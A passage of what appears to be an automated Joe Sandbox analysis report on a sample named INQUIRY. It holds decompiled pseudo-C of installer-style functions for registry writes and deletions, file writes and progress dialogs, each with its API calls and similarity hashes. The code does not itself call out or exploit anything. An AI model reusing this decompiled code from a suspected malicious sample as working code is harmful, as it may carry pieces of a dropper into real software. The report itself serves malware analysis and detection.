                          				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t58 - 4));
                          				return 0;
                          			}











                          0x0040266e
                          0x00402670
                          0x0040267c
                          0x0040267f
                          0x00402689
                          0x0040268d
                          0x0040268d
                          0x00402693
                          0x004026a0
                          0x004026a8
                          0x004026ab
                          0x004026b1
                          0x004026bf
                          0x004026c4
                          0x004026c8
                          0x004026cb
                          0x004026d4
                          0x004026e0
                          0x004026e4
                          0x004026e7
                          0x004026f1
                          0x00402710
                          0x004026f8
                          0x004026fd
                          0x00402705
                          0x00402708
                          0x0040270d
                          0x0040270d
                          0x00402717
                          0x00402717
                          0x00402729
                          0x00402730
                          0x00402742
                          0x00402742
                          0x00402748
                          0x00402748
                          0x00402753
                          0x00402754
                          0x00402758
                          0x0040275c
                          0x00402762
                          0x00402762
                          0x00402769
                          0x00402156
                          0x00402880
                          0x0040288c

                          APIs
                          • GlobalAlloc.KERNEL32(00000040,0000B600,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 004026C2
                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,000000F0), ref: 004026DE
                          • GlobalFree.KERNEL32 ref: 00402717
                          • WriteFile.KERNEL32(FFFFFD66,00000000,?,FFFFFD66,?,?,?,?,000000F0), ref: 00402729
                          • GlobalFree.KERNEL32 ref: 00402730
                          • CloseHandle.KERNEL32(FFFFFD66,?,?,000000F0), ref: 00402748
                          • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 0040275C
                          Memory Dump Source
                          • Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd
                          Similarity
                          • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                          • String ID:
                          • API String ID: 3294113728-0
                          • Opcode ID: 4c0fd2d05d9642674c9ab6b4876f57fc245776767d9f13474b3403e8ff6ab1b0
                          • Instruction ID: 9ca9f948efa3d3b3c01768b84b42719a88da944e93008125b7d5b0dd1b363230
                          • Opcode Fuzzy Hash: 4c0fd2d05d9642674c9ab6b4876f57fc245776767d9f13474b3403e8ff6ab1b0
                          • Instruction Fuzzy Hash: 5B318D71C00128BBDF216FA9CD89D9E7E79EF09364F10422AF910772E0D7795D419BA8
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00404E23(CHAR* _a4, CHAR* _a8) {
                          				struct HWND__* _v8;
                          				signed int _v12;
                          				CHAR* _v32;
                          				long _v44;
                          				int _v48;
                          				void* _v52;
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				CHAR* _t26;
                          				signed int _t27;
                          				CHAR* _t28;
                          				long _t29;
                          				signed int _t39;
                          
                          				_t26 =  *0x423684; // 0x0
                          				_v8 = _t26;
                          				if(_t26 != 0) {
                          					_t27 =  *0x423f54; // 0x0
                          					_v12 = _t27;
                          					_t39 = _t27 & 0x00000001;
                          					if(_t39 == 0) {
                          						E00405AA7(0, _t39, 0x41fc70, 0x41fc70, _a4);
                          					}
                          					_t26 = lstrlenA(0x41fc70);
                          					_a4 = _t26;
                          					if(_a8 == 0) {
                          						L6:
                          						if((_v12 & 0x00000004) == 0) {
                          							_t26 = SetWindowTextA( *0x423668, 0x41fc70);
                          						}
                          						if((_v12 & 0x00000002) == 0) {
                          							_v32 = 0x41fc70;
                          							_v52 = 1;
                          							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
                          							_v44 = 0;
                          							_v48 = _t29 - _t39;
                          							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
                          							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
                          						}
                          						if(_t39 != 0) {
                          							_t28 = _a4;
                          							 *((char*)(_t28 + 0x41fc70)) = 0;
                          							return _t28;
                          						}
                          					} else {
                          						_t26 =  &(_a4[lstrlenA(_a8)]);
                          						if(_t26 < 0x800) {
                          							_t26 = lstrcatA(0x41fc70, _a8);
                          							goto L6;
                          						}
                          					}
                          				}
                          				return _t26;
                          			}

















                          0x00404e29
                          0x00404e35
                          0x00404e38
                          0x00404e3e
                          0x00404e4a
                          0x00404e4d
                          0x00404e50
                          0x00404e56
                          0x00404e56
                          0x00404e5c
                          0x00404e64
                          0x00404e67
                          0x00404e84
                          0x00404e88
                          0x00404e91
                          0x00404e91
                          0x00404e9b
                          0x00404ea4
                          0x00404eb0
                          0x00404eb7
                          0x00404ebb
                          0x00404ebe
                          0x00404ed1
                          0x00404edf
                          0x00404edf
                          0x00404ee3
                          0x00404ee5
                          0x00404ee8
                          0x00000000
                          0x00404ee8
                          0x00404e69
                          0x00404e71
                          0x00404e79
                          0x00404e7f
                          0x00000000
                          0x00404e7f
                          0x00404e79
                          0x00404e67
                          0x00404ef2

                          APIs
                          • lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
                          • lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
                          • lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
                          • SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
                          • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404EB7
                          • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404ED1
                          • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404EDF
                          Memory Dump Source
                          • Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd
                          Similarity
                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                          • String ID:
                          • API String ID: 2531174081-0
                          • Opcode ID: 6af7de6fb12d37621311d767828a5214a6e37c73fc4d498048a22c56ae339c00
                          • Instruction ID: 451019a1d205659c79ebfdec41688bb46c1145c2f0803241f2332644a3b6c24c
                          • Opcode Fuzzy Hash: 6af7de6fb12d37621311d767828a5214a6e37c73fc4d498048a22c56ae339c00
                          • Instruction Fuzzy Hash: 12217C71A00118BBCB119FA5DD809DFBFB9FB44354F00807AF904A6290C7394E45CF98
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E004046F2(struct HWND__* _a4, intOrPtr _a8) {
                          				long _v8;
                          				signed char _v12;
                          				unsigned int _v16;
                          				void* _v20;
                          				intOrPtr _v24;
                          				long _v56;
                          				void* _v60;
                          				long _t15;
                          				unsigned int _t19;
                          				signed int _t25;
                          				struct HWND__* _t28;
                          
                          				_t28 = _a4;
                          				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
                          				if(_a8 == 0) {
                          					L4:
                          					_v56 = _t15;
                          					_v60 = 4;
                          					SendMessageA(_t28, 0x110c, 0,  &_v60);
                          					return _v24;
                          				}
                          				_t19 = GetMessagePos();
                          				_v16 = _t19 >> 0x10;
                          				_v20 = _t19;
                          				ScreenToClient(_t28,  &_v20);
                          				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
                          				if((_v12 & 0x00000066) != 0) {
                          					_t15 = _v8;
                          					goto L4;
                          				}
                          				return _t25 | 0xffffffff;
                          			}














                          0x00404700
                          0x0040470d
                          0x00404713
                          0x00404751
                          0x00404751
                          0x00404760
                          0x00404767
                          0x00000000
                          0x00404769
                          0x00404715
                          0x00404724
                          0x0040472c
                          0x0040472f
                          0x00404741
                          0x00404747
                          0x0040474e
                          0x00000000
                          0x0040474e
                          0x00000000

                          APIs
                          • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040470D
                          • GetMessagePos.USER32 ref: 00404715
                          • ScreenToClient.USER32 ref: 0040472F
                          • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404741
                          • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404767
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd
                          Similarity
                          • API ID: Message$Send$ClientScreen
                          • String ID: f
                          • API String ID: 41195575-1993550816
                          • Opcode ID: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
                          • Instruction ID: 77fe7446b7d437ffed3a300e181f1a5f8136abba45dafe536ab26234a61f9ca7
                          • Opcode Fuzzy Hash: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
                          • Instruction Fuzzy Hash: 74014071D00219BADB01DBA4DD45BFEBBB8AB55711F10012ABA10B71C0D7B4A5018B95
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00402B2D(struct HWND__* _a4, intOrPtr _a8) {
                          				char _v68;
                          				void* _t11;
                          				CHAR* _t19;
                          
                          				if(_a8 == 0x110) {
                          					SetTimer(_a4, 1, 0xfa, 0);
                          					_a8 = 0x113;
                          				}
                          				if(_a8 == 0x113) {
                          					_t11 = E00402BA9();
                          					_t19 = "unpacking data: %d%%";
                          					if( *0x423eb0 == 0) {
                          						_t19 = "verifying installer: %d%%";
                          					}
                          					wsprintfA( &_v68, _t19, _t11);
                          					SetWindowTextA(_a4,  &_v68);
                          					SetDlgItemTextA(_a4, 0x406,  &_v68);
                          				}
                          				return 0;
                          			}






                          0x00402b3a
                          0x00402b48
                          0x00402b4e
                          0x00402b4e
                          0x00402b5c
                          0x00402b5e
                          0x00402b6a
                          0x00402b6f
                          0x00402b71
                          0x00402b71
                          0x00402b7c
                          0x00402b8c
                          0x00402b9e
                          0x00402b9e
                          0x00402ba6

                          APIs
                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B48
                          • wsprintfA.USER32 ref: 00402B7C
                          • SetWindowTextA.USER32(?,?), ref: 00402B8C
                          • SetDlgItemTextA.USER32 ref: 00402B9E
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd
                          Similarity
                          • API ID: Text$ItemTimerWindowwsprintf
                          • String ID: unpacking data: %d%%$verifying installer: %d%%
                          • API String ID: 1451636040-1158693248
                          • Opcode ID: e04cdd19e0c63b62eaa7e8eced31868a1262f8adf0a2f46f7645d1242f1aea5d
                          • Instruction ID: 63589245c82b20a35a818b51aea08eb627593e3ecb5db54badb7bc3d6c1792f2
                          • Opcode Fuzzy Hash: e04cdd19e0c63b62eaa7e8eced31868a1262f8adf0a2f46f7645d1242f1aea5d
                          • Instruction Fuzzy Hash: F3F01D70900209ABEF215F50DD0ABAA3779BB04345F00803AFA06A91D1D7B9AA569B99
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 90%
                          			E004022F5(void* __eax) {
                          				void* _t15;
                          				char* _t18;
                          				int _t19;
                          				char _t24;
                          				int _t27;
                          				signed int _t30;
                          				intOrPtr _t35;
                          				void* _t37;
                          
                          				_t15 = E00402ADD(__eax);
                          				_t35 =  *((intOrPtr*)(_t37 - 0x14));
                          				 *(_t37 - 0x30) =  *(_t37 - 0x10);
                          				 *(_t37 - 0x44) = E004029E8(2);
                          				_t18 = E004029E8(0x11);
                          				_t30 =  *0x423f50; // 0x0
                          				_t31 = _t30 | 0x00000002;
                          				 *(_t37 - 4) = 1;
                          				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27, _t30 | 0x00000002, _t27, _t37 + 8, _t27);
                          				if(_t19 == 0) {
                          					if(_t35 == 1) {
                          						E004029E8(0x23);
                          						_t19 = lstrlenA(0x40a368) + 1;
                          					}
                          					if(_t35 == 4) {
                          						_t24 = E004029CB(3);
                          						 *0x40a368 = _t24;
                          						_t19 = _t35;
                          					}
                          					if(_t35 == 3) {
                          						_t19 = E00402F01(_t31,  *((intOrPtr*)(_t37 - 0x18)), _t27, 0x40a368, 0xc00);
                          					}
                          					if(RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x44), _t27,  *(_t37 - 0x30), 0x40a368, _t19) == 0) {
                          						 *(_t37 - 4) = _t27;
                          					}
                          					_push( *(_t37 + 8));
                          					RegCloseKey();
                          				}
                          				 *0x423f28 =  *0x423f28 +  *(_t37 - 4);
                          				return 0;
                          			}











                          0x004022f6
                          0x004022fb
                          0x00402305
                          0x0040230f
                          0x00402312
                          0x0040231c
                          0x00402322
                          0x0040232c
                          0x00402333
                          0x0040233b
                          0x00402349
                          0x0040234d
                          0x00402358
                          0x00402358
                          0x0040235c
                          0x00402360
                          0x00402366
                          0x0040236b
                          0x0040236b
                          0x0040236f
                          0x0040237b
                          0x0040237b
                          0x00402394
                          0x00402396
                          0x00402396
                          0x00402399
                          0x0040246f
                          0x0040246f
                          0x00402880
                          0x0040288c

                          APIs
                          • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402333
                          • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsc48D6.tmp,00000023,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402353
                          • RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsc48D6.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 0040238C
                          • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsc48D6.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 0040246F
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd
                          Similarity
                          • API ID: CloseCreateValuelstrlen
                          • String ID: C:\Users\user\AppData\Local\Temp\nsc48D6.tmp
                          • API String ID: 1356686001-488356209
                          • Opcode ID: 652f9a8a3f1dc98aeeeb98f906d59e2320e136a87a08436aae013fd7976f2720
                          • Instruction ID: c0f72d529a206c1f33eb9b8d59e365bb4fe54d10a3d93e78d78dba992e985e14
                          • Opcode Fuzzy Hash: 652f9a8a3f1dc98aeeeb98f906d59e2320e136a87a08436aae013fd7976f2720
                          • Instruction Fuzzy Hash: 0F1175B1E00118BFEB10AFA1DE4AEAF767CEB04758F10443AF505B71D0D6B99D019A69
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00402BC5(intOrPtr _a4) {
                          				char _v68;
                          				long _t6;
                          				struct HWND__* _t7;
                          				struct HWND__* _t14;
                          
                          				if(_a4 != 0) {
                          					_t14 =  *0x417044; // 0x0
                          					if(_t14 != 0) {
                          						_t14 = DestroyWindow(_t14);
                          					}
                          					 *0x417044 = 0;
                          					return _t14;
                          				}
                          				__eflags =  *0x417044; // 0x0
                          				if(__eflags != 0) {
                          					return E00405DDC(0);
                          				}
                          				_t6 = GetTickCount();
                          				__eflags = _t6 -  *0x423eac;
                          				if(_t6 >  *0x423eac) {
                          					__eflags =  *0x423ea8; // 0x0
                          					if(__eflags == 0) {
                          						_t7 = CreateDialogParamA( *0x423ea0, 0x6f, 0, E00402B2D, 0);
                          						 *0x417044 = _t7;
                          						return _t7;
                          					}
                          					__eflags =  *0x423f54 & 0x00000001;
                          					if(( *0x423f54 & 0x00000001) != 0) {
                          						wsprintfA( &_v68, "... %d%%", E00402BA9());
                          						return E00404E23(0,  &_v68);
                          					}
                          				}
                          				return _t6;
                          			}







                          0x00402bd1
                          0x00402bd3
                          0x00402bda
                          0x00402bdd
                          0x00402bdd
                          0x00402be3
                          0x00000000
                          0x00402be3
                          0x00402beb
                          0x00402bf1
                          0x00000000
                          0x00402bf4
                          0x00402bfb
                          0x00402c01
                          0x00402c07
                          0x00402c09
                          0x00402c0f
                          0x00402c4d
                          0x00402c53
                          0x00000000
                          0x00402c53
                          0x00402c11
                          0x00402c18
                          0x00402c29
                          0x00000000
                          0x00402c37
                          0x00402c18
                          0x00402c5a

                          APIs
                          • DestroyWindow.USER32(00000000,00000000), ref: 00402BDD
                          • GetTickCount.KERNEL32 ref: 00402BFB
                          • CreateDialogParamA.USER32(0000006F,00000000,00402B2D,00000000), ref: 00402C4D
                            • Part of subcall function 00402BA9: MulDiv.KERNEL32(00000000,00000064,000032D2), ref: 00402BBE
                          • wsprintfA.USER32 ref: 00402C29
                            • Part of subcall function 00404E23: lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
                            • Part of subcall function 00404E23: lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
                            • Part of subcall function 00404E23: lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
                            • Part of subcall function 00404E23: SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
                            • Part of subcall function 00404E23: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404EB7
                            • Part of subcall function 00404E23: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404ED1
                            • Part of subcall function 00404E23: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404EDF
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd
                          Similarity
                          • API ID: MessageSend$Windowlstrlen$CountCreateDestroyDialogParamTextTicklstrcatwsprintf
                          • String ID: ... %d%%
                          • API String ID: 632923820-2449383134
                          • Opcode ID: 9ac0c74c1306bbd1fe40de56f6429fb106574e4c029b9f6bcf9b72350caeebfb
                          • Instruction ID: 259a824e759da58d6bdbd9050b41674a690fb301749dacda7e517d53f8420425
                          • Opcode Fuzzy Hash: 9ac0c74c1306bbd1fe40de56f6429fb106574e4c029b9f6bcf9b72350caeebfb
                          • Instruction Fuzzy Hash: 29019270909224EBDB216F60EF4C99F7B78AB047017104137F801B12D1C6BCA986C6EE
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 84%
                          			E00402A28(void* _a4, char* _a8, long _a12) {
                          				void* _v8;
                          				char _v272;
                          				signed char _t16;
                          				long _t18;
                          				long _t25;
                          				intOrPtr* _t27;
                          				long _t28;
                          
                          				_t16 =  *0x423f50; // 0x0
                          				_t18 = RegOpenKeyExA(_a4, _a8, 0, _t16 | 0x00000008,  &_v8);
                          				if(_t18 == 0) {
                          					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
                          						__eflags = _a12;
                          						if(_a12 != 0) {
                          							RegCloseKey(_v8);
                          							L8:
                          							__eflags = 1;
                          							return 1;
                          						}
                          						_t25 = E00402A28(_v8,  &_v272, 0);
                          						__eflags = _t25;
                          						if(_t25 != 0) {
                          							break;
                          						}
                          					}
                          					RegCloseKey(_v8);
                          					_t27 = E00405DA3(2);
                          					if(_t27 == 0) {
                          						__eflags =  *0x423f50; // 0x0
                          						if(__eflags != 0) {
                          							goto L8;
                          						}
                          						_t28 = RegDeleteKeyA(_a4, _a8);
                          						__eflags = _t28;
                          						if(_t28 != 0) {
                          							goto L8;
                          						}
                          						return _t28;
                          					}
                          					return  *_t27(_a4, _a8,  *0x423f50, 0);
                          				}
                          				return _t18;
                          			}










                          0x00402a38
                          0x00402a49
                          0x00402a51
                          0x00402a79
                          0x00402a60
                          0x00402a63
                          0x00402ab3
                          0x00402ab9
                          0x00402abb
                          0x00000000
                          0x00402abb
                          0x00402a70
                          0x00402a75
                          0x00402a77
                          0x00000000
                          0x00000000
                          0x00402a77
                          0x00402a8e
                          0x00402a96
                          0x00402a9d
                          0x00402ac3
                          0x00402ac9
                          0x00000000
                          0x00000000
                          0x00402ad1
                          0x00402ad7
                          0x00402ad9
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00402ad9
                          0x00000000
                          0x00402aac
                          0x00402ac0

                          APIs
                          • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000000,?), ref: 00402A49
                          • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A85
                          • RegCloseKey.ADVAPI32(?), ref: 00402A8E
                          • RegCloseKey.ADVAPI32(?), ref: 00402AB3
                          • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402AD1
                          Memory Dump Source
                          • Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd
                          Similarity
                          • API ID: Close$DeleteEnumOpen
                          • String ID:
                          • API String ID: 1912718029-0
                          • Opcode ID: 188da090bc2c0dda3339140851fe508e253b0801d39640d6a2b0d173e59915d9
                          • Instruction ID: 7ac3799e0b9b7f286de12d9a89f233b53136cfd59643404f79253a10a0ceffad
                          • Opcode Fuzzy Hash: 188da090bc2c0dda3339140851fe508e253b0801d39640d6a2b0d173e59915d9
                          • Instruction Fuzzy Hash: AA115931A00009FEDF21AF90DE48DAB3B79EB44395B104536BA05A01A0DB749E51AE69
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00401CC1(int __edx) {
                          				void* _t17;
                          				struct HINSTANCE__* _t21;
                          				struct HWND__* _t25;
                          				void* _t27;
                          
                          				_t25 = GetDlgItem( *(_t27 - 0x34), __edx);
                          				GetClientRect(_t25, _t27 - 0x40);
                          				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E004029E8(_t21), _t21,  *(_t27 - 0x38) *  *(_t27 - 0x1c),  *(_t27 - 0x34) *  *(_t27 - 0x1c), 0x10));
                          				if(_t17 != _t21) {
                          					DeleteObject(_t17);
                          				}
                          				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t27 - 4));
                          				return 0;
                          			}







                          0x00401ccb
                          0x00401cd2
                          0x00401d01
                          0x00401d09
                          0x00401d10
                          0x00401d10
                          0x00402880
                          0x0040288c

                          APIs
                          • GetDlgItem.USER32 ref: 00401CC5
                          • GetClientRect.USER32 ref: 00401CD2
                          • LoadImageA.USER32 ref: 00401CF3
                          • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D01
                          • DeleteObject.GDI32(00000000), ref: 00401D10
                          Memory Dump Source
                          • Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd
                          Similarity
                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                          • String ID:
                          • API String ID: 1849352358-0
                          • Opcode ID: 93d2110668d3094e167584d1b1b6540c5cd1076fe79007bc13e6d0e6a309afb7
                          • Instruction ID: ad5020e38ef11d08f371025551c7f23f007b957d45941c5b52acf933ea75ddf9
                          • Opcode Fuzzy Hash: 93d2110668d3094e167584d1b1b6540c5cd1076fe79007bc13e6d0e6a309afb7
                          • Instruction Fuzzy Hash: 31F0F9B2A04105BFD700EBA4EE89DAFB7BDEB44341B104476F601F21A0C7789D018B29
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 51%
                          			E00404610(int _a4, intOrPtr _a8, unsigned int _a12) {
                          				char _v36;
                          				char _v68;
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				void* _t26;
                          				void* _t34;
                          				signed int _t36;
                          				signed int _t39;
                          				unsigned int _t46;
                          
                          				_t46 = _a12;
                          				_push(0x14);
                          				_pop(0);
                          				_t34 = 0xffffffdc;
                          				if(_t46 < 0x100000) {
                          					_push(0xa);
                          					_pop(0);
                          					_t34 = 0xffffffdd;
                          				}
                          				if(_t46 < 0x400) {
                          					_t34 = 0xffffffde;
                          				}
                          				if(_t46 < 0xffff3333) {
                          					_t39 = 0x14;
                          					asm("cdq");
                          					_t46 = _t46 + 1 / _t39;
                          				}
                          				_push(E00405AA7(_t34, 0, _t46,  &_v36, 0xffffffdf));
                          				_push(E00405AA7(_t34, 0, _t46,  &_v68, _t34));
                          				_t21 = _t46 & 0x00ffffff;
                          				_t36 = 0xa;
                          				_push(((_t46 & 0x00ffffff) + _t21 * 4 + (_t46 & 0x00ffffff) + _t21 * 4 >> 0) % _t36);
                          				_push(_t46 >> 0);
                          				_t26 = E00405AA7(_t34, 0, 0x420498, 0x420498, _a8);
                          				wsprintfA(_t26 + lstrlenA(0x420498), "%u.%u%s%s");
                          				return SetDlgItemTextA( *0x423678, _a4, 0x420498);
                          			}













                          0x00404618
                          0x0040461c
                          0x00404624
                          0x00404627
                          0x00404628
                          0x0040462a
                          0x0040462c
                          0x0040462f
                          0x0040462f
                          0x00404636
                          0x0040463c
                          0x0040463c
                          0x00404643
                          0x0040464e
                          0x0040464f
                          0x00404652
                          0x00404652
                          0x0040465f
                          0x0040466a
                          0x0040466d
                          0x0040467f
                          0x00404686
                          0x00404687
                          0x00404696
                          0x004046a6
                          0x004046c2

                          APIs
